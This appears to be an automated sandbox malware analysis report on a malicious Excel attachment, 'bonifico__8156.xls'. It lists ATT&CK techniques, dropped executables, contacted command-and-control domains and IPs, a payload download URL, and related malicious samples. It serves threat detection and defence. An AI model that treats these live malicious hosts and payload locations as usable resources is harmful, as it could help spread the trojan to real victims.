Replication Through Removable Media	Rundll321	Valid Accounts1	Valid Accounts1	Rundll321	Hooking3	Peripheral Device Discovery1	Remote Services	Data from Local System1	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Scripting31	Accessibility Features	Access Token Manipulation1	Scripting31	Input Capture1	Account Discovery1	Windows Remote Management	Input Capture1	Automated Exfiltration	Standard Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Execution through API2	System Firmware	Process Injection713	Obfuscated Files or Information1	Credentials in Files	Security Software Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol12	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Exploitation for Client Execution4	Shortcut Modification	File System Permissions Weakness	Rootkit4	Account Manipulation	File and Directory Discovery3	Shared Webroot	Data Staged	Scheduled Transfer	Connection Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Spearphishing Link	Graphical User Interface1	Modify Existing Service	New Service	Masquerading1	Brute Force	System Information Discovery14	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port	Jamming or Denial of Service		Abuse Accessibility Features
Spearphishing Attachment	Command-Line Interface3	Path Interception	Scheduled Task	Valid Accounts1	Two-Factor Authentication Interception	Query Registry1	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Spearphishing via Service	Third-party Software	Logon Scripts	Process Injection	Access Token Manipulation1	Bash History	Process Discovery3	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Supply Chain Compromise	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection713	Input Prompt	System Owner/User Discovery1	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption	Rogue Cellular Base Station		Data Destruction
Trusted Relationship	PowerShell	Change Default File Association	Exploitation for Privilege Escalation	DLL Side-Loading1	Keychain	Remote System Discovery1	Taint Shared Content	Audio Capture	Commonly Used Port	Connection Proxy			Data Encrypted for Impact
Hardware Additions	Execution through API	File System Permissions Weakness	Valid Accounts	Connection Proxy1	Private Keys	System Network Configuration Discovery1	Replication Through Removable Media	Video Capture	Standard Application Layer Protocol	Communication Through Removable Media			Disk Structure Wipe

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bonifico__8156.xls	22%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\0n1ine[1].exe	100%	Joe Sandbox ML
C:\sxibiNa\ZpsvnMb\CVPFktt.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.CVPFktt.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
5.1.CVPFktt.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
line.beibiandmom.com	0%	Virustotal		Browse
gstat.ddoborguild.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.mercadolivre.com.br/	0%	Virustotal		Browse
http://www.mercadolivre.com.br/	0%	Avira URL Cloud	safe
http://www.merlin.com.pl/favicon.ico	0%	Virustotal		Browse
http://www.merlin.com.pl/favicon.ico	0%	Avira URL Cloud	safe
http://www.dailymail.co.uk/	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	Avira URL Cloud	safe
http://%s.com	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	Avira URL Cloud	safe
http://line.beibiandmom.com/favicon.ico	0%	Avira URL Cloud	safe
http://line.beibiandmom.com/images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_2BKgs	0%	Avira URL Cloud	safe
http://line.beibiandmom.com/images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_	0%	Avira URL Cloud	safe
http://www.etmall.com.tw/favicon.ico	0%	Avira URL Cloud	safe
http://it.search.dada.net/favicon.ico	0%	Avira URL Cloud	safe
http://search.hanafos.com/favicon.ico	0%	Avira URL Cloud	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	Avira URL Cloud	safe
http://line.beibiandmom.com/images/YqDbBmJ03/HYNI5QMFQ8KnA0Xlg2l4/IETRZjPpb2nK14jcJh7/OeJxoopStvUXHEz47drnw5/oWWDMZhUKORHw/illHxVP8/_2F_2FqJ9TdlRGk6Rd0_2BD/fm9UfWK99O/jXxQB7II3lMb6Vbk5/0fe74JetcpI/2xLI.avi	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	Avira URL Cloud	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	Avira URL Cloud	safe
http://search.auction.co.kr/	0%	Avira URL Cloud	safe
http://busca.buscape.com.br/favicon.ico	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	Avira URL Cloud	safe
http://browse.guardian.co.uk/favicon.ico	0%	Avira URL Cloud	safe
http://google.pchome.com.tw/	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.gmarket.co.kr/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://searchresults.news.com.au/	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp	0%	Avira URL Cloud	safe
http://buscador.terra.es/	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://fontfabrik.com	0%	Avira URL Cloud	safe
http://search.orange.co.uk/favicon.ico	0%	Avira URL Cloud	safe
http://www.iask.com/	0%	Avira URL Cloud	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
line.beibiandmom.com	89.111.132.159	true	false	0%, Virustotal, Browse	unknown
gstat.ddoborguild.com	85.239.35.110	true	true	1%, Virustotal, Browse	unknown
mcc.avast.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://line.beibiandmom.com/favicon.ico	false	Avira URL Cloud: safe	unknown
http://line.beibiandmom.com/images/YqDbBmJ03/HYNI5QMFQ8KnA0Xlg2l4/IETRZjPpb2nK14jcJh7/OeJxoopStvUXHEz47drnw5/oWWDMZhUKORHw/illHxVP8/_2F_2FqJ9TdlRGk6Rd0_2BD/fm9UfWK99O/jXxQB7II3lMb6Vbk5/0fe74JetcpI/2xLI.avi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://search.ebay.de/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.msn.com/de-ch/?ocid=iehp#	explorer.exe, 00000014.00000002.982359410.0000000005171000.00000004.00000001.sdmp	false		high
http://www3.fnac.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehp$	explorer.exe, 00000014.00000002.982359410.0000000005171000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	CVPFktt.exe, 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, control.exe, 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	CVPFktt.exe, 00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp, CVPFktt.exe, 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, control.exe, 00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://%s.com	explorer.exe, 00000014.00000000.917616160.000000000E880000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://msk.afisha.ru/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe	low
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.rediff.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://line.beibiandmom.com/images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_2BKgs	explorer.exe, 00000014.00000000.909700398.0000000004FE0000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.894079394.00000000027A0000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.984862867.0000000006EC9000.00000004.00000001.sdmp, explorer.exe, 00000014.00000002.981761481.0000000004FE0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ya.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://line.beibiandmom.com/images/3_2FaICNUesWBp6cSMSOvh/R7KiXoQV8WPnC/Gi5kIny8/M1v_2BPzvRNcy_	explorer.exe, 00000014.00000002.958310392.00000000009F0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000018.00000000.927450284.000002086BD90000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://it.search.dada.net/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.naver.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.abril.com.br/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.daum.net/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.clarin.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://kr.search.yahoo.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://suche.t-online.de/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.ceneo.pl/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://google.pchome.com.tw/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://mcc.avast.com	CVPFktt.exe, 00000005.00000003.782541250.0000000000ADC000.00000004.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.sify.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.ebay.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.nifty.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.msn.com/de-ch/?ocid=iehpLMEMh	explorer.exe, 00000014.00000000.912661873.0000000006DB0000.00000004.00000001.sdmp	false		high
http://www.google.si/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://busca.orange.es/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000014.00000000.917616160.000000000E880000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.target.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.typography.netD	explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000014.00000000.914582302.000000000AC96000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.iask.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.tesco.com/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.seznam.cz/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000014.00000000.918163827.000000000E973000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
89.111.132.159	Russian Federation	48287	unknown	false
185.98.87.176	Russian Federation	205840	unknown	false
85.239.35.110	Russian Federation	35178	unknown	true

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	1144279
Start date:	27.05.2020
Start time:	10:29:15
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 12m 14s
Localized Internet Anonymization:	Successful Pool ID 'Italy'
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	bonifico__8156.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit (version 1803) with Office 2016 Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.bank.troj.spyw.expl.evad.winXLS@27/63@10/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 2.8% (good quality ratio 2.6%) Quality average: 85.8% Quality standard deviation: 24.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 142 Number of non-executed functions: 270
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.107.42.23, 52.109.88.8, 173.223.236.107, 52.109.12.19, 205.185.216.10, 205.185.216.42, 104.106.124.147, 152.199.19.161, 23.5.230.228 Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, fs.microsoft.com, ie9comview.vo.msecnd.net, prod.configsvc1.live.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.nexusrules.live.com.akadns.net, config.officeapps.live.com, go.microsoft.com.edgekey.net, l-0014.l-msedge.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
85.239.35.110	bonifico__8156.xls	Get hash	malicious	Browse	gstat.ddoborguild.com/0n1ine.exe
85.239.35.110	bonifico__8156.xls	Get hash	malicious	Browse	gstat.ddoborguild.com/0n1ine.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gstat.ddoborguild.com	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Datei 05.25.2020.doc	Get hash	malicious	Browse	91.215.169.248
	Datei 05.25.2020.doc	Get hash	malicious	Browse	91.215.169.248
	50dEFDImnl.exe	Get hash	malicious	Browse	77.88.21.158
	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110
	Odeme makbuzu.exe	Get hash	malicious	Browse	77.88.21.158
	http://xia.vzboot.com/234.sh	Get hash	malicious	Browse	52.26.114.88
	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110
	nPwbB.exe	Get hash	malicious	Browse	192.168.0.192
	https://u16340172.ct.sendgrid.net/ls/click?upn=lSGfpufETOVHbuao6v35fRtv1PVZ-2BRByXHtmX9nwqRpcyw6H79xas2IvMq1kw4ONTw-2Fvi-2F2Y2XrwK5kqYrhgUQ-3D-3Dcj0k_VdzTht8YAi698vJgaNLalENr4TvnC6UD-2FwZrCQlea78ysFkQl7sZeRl1uf-2B5cpVqELcmQ2uTq1Kq-2BzKt3AX-2F9-2FnN30JHTZOIHgCDAS-2F1kuwQcRmDgP9jNp9tBQIsX0VlQuIST1g7o4Bqkgr3o2sZmr337dzsuCa8t906xy0xZc6yy96Yy7BYLNj-2BcolZKM2Jrgm773yeBmwyT-2Fvn25-2FmzrwIArq2UXntfjB0Gz2OmUU-3D	Get hash	malicious	Browse	35.209.239.70
	Order.pdf.exe	Get hash	malicious	Browse	107.180.41.151
	6WqwIdpMM1.exe	Get hash	malicious	Browse	176.123.7.51
	https://rpmi.aspire.co/ucs/dl/micollab_pc.msi	Get hash	malicious	Browse	148.253.163.9
	AD_loc_cl-3528474.xls	Get hash	malicious	Browse	104.31.88.81
	AD_loc_cl-3528474.xls	Get hash	malicious	Browse	172.67.143.61
	https://blueslateherb.gq/a/ofc	Get hash	malicious	Browse	104.16.133.229
	http://41.33.13.26	Get hash	malicious	Browse	104.16.132.229
	http://evoltrade.fun/comments/cuttop.php	Get hash	malicious	Browse	54.164.243.243
	Purchase_Order_000A6230520.html	Get hash	malicious	Browse	104.19.143.111
	Financial Statement.HTML	Get hash	malicious	Browse	23.253.180.149
	http://new-evoltrade.fun/goods/task.php	Get hash	malicious	Browse	54.164.243.243
unknown	Datei 05.25.2020.doc	Get hash	malicious	Browse	91.215.169.248
	Datei 05.25.2020.doc	Get hash	malicious	Browse	91.215.169.248
	50dEFDImnl.exe	Get hash	malicious	Browse	77.88.21.158
	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110
	Odeme makbuzu.exe	Get hash	malicious	Browse	77.88.21.158
	http://xia.vzboot.com/234.sh	Get hash	malicious	Browse	52.26.114.88
	bonifico__8156.xls	Get hash	malicious	Browse	85.239.35.110
	nPwbB.exe	Get hash	malicious	Browse	192.168.0.192
	https://u16340172.ct.sendgrid.net/ls/click?upn=lSGfpufETOVHbuao6v35fRtv1PVZ-2BRByXHtmX9nwqRpcyw6H79xas2IvMq1kw4ONTw-2Fvi-2F2Y2XrwK5kqYrhgUQ-3D-3Dcj0k_VdzTht8YAi698vJgaNLalENr4TvnC6UD-2FwZrCQlea78ysFkQl7sZeRl1uf-2B5cpVqELcmQ2uTq1Kq-2BzKt3AX-2F9-2FnN30JHTZOIHgCDAS-2F1kuwQcRmDgP9jNp9tBQIsX0VlQuIST1g7o4Bqkgr3o2sZmr337dzsuCa8t906xy0xZc6yy96Yy7BYLNj-2BcolZKM2Jrgm773yeBmwyT-2Fvn25-2FmzrwIArq2UXntfjB0Gz2OmUU-3D	Get hash	malicious	Browse	35.209.239.70
	Order.pdf.exe	Get hash	malicious	Browse	107.180.41.151
	6WqwIdpMM1.exe	Get hash	malicious	Browse	176.123.7.51
	https://rpmi.aspire.co/ucs/dl/micollab_pc.msi	Get hash	malicious	Browse	148.253.163.9
